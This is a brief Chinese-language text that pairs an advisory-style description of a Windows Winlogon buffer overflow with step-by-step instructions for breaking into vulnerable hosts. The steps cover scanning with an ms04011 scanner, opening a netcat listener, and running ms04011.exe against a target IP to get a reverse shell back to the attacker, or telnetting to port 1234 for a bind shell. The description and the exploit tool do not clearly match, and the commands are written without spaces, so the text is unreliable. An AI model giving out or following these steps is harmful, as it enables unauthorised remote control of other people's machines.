受影响系统：

MicrosoftWindowsXP

MicrosoftWindowsNT4.0

MicrosoftWindows2000

描述：

MicrosoftWindowsWinlogon存在进程一个缓冲区溢出，远程攻击者可以利用这个漏洞可能以进程权限执行任意指令。

由于Winlogon在登录过程中使用的数据值大小没有进行任何检查就插入到分配的缓冲区中，可导致发生缓冲区溢出，精心构建提交数据可能以进程权限在系统上执行任意指令。

1用ms04011漏洞扫描器扫出有漏洞的主机扫到有VULNERABLE字样的说明主机有漏洞的可能性非常大

2扫到后用NC来监听nc-l-p监听端口-----按回车或nc-vv-l-p监听端口

3方式ms04011.exe0要入侵的IP监听端口自己IP

其中0表示2000系统NT5.01表示XP系统NT5.1

或者----------------------------------------------

先ms04011.exe0要入侵的IP

然后直接telnet要入侵的IP1234。